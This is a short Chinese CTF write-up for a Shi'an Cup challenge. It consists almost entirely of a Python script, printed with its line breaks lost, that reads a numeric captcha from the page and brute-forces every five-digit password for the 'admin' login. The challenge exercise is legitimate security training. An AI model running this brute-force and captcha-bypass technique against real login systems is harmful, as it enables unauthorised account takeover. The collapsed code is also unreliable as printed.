爆破脚本+过验证码

原题链接：http://ctf1.shiyanbar.com/shian-s/

世安杯线上赛的一道题目，，，主要是仔细，，，查看源码

这就很明显了，爆破，坑点在于有验证码

脚本附在下面，，，

__author__="GETF"import requestsimport refrom requests.exceptions import RequestException#第一次获取验证码def D(s):    url = "http://ctf1.shiyanbar.com/shian-s/"    html=s.get(url)    r = html.text.encode('ISO-8859-1').decode(html.apparent_encoding)    pattern = re.compile(r'(\d)(\d)(\d)')    code = pattern.findall(r)    randcode = code[0][0] + code[0][1] + code[0][2]    return randcodedef get_one_page(url,s):    try:        response=s.get(url=url)        if response.status_code == 200:#print(response.text)            #print(response.encoding)            #print(response.apparent_encoding)            r=response.text            #print(requests.utils.get_encodings_from_content(r)[0])            #a=r.encode('ISO-8859-1').decode(requests.utils.get_encodings_from_content(r)[0])            #print(a)            print('------------------------------------')            b = r.encode('ISO-8859-1').decode(response.apparent_encoding)            if(len(b) != 145):                print(b)        return None    except RequestException:        return Nonedef main():    for i in range(0,10):        for j in range(0,10):            for k in range(0,10):                for m in range(0,10):                    for n in range(0,10):                        payload = '{0}{1}{2}{3}{4}'.format(i,j,k,m,n)                        print(payload)                        s = requests.session()                        s.get("http://ctf1.shiyanbar.com/shian-s/")                        randcode = D(s)                        url = 'http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={0}&randcode={1}'.format(payload,randcode)                        get_one_page(url,s)if __name__=='__main__':        main()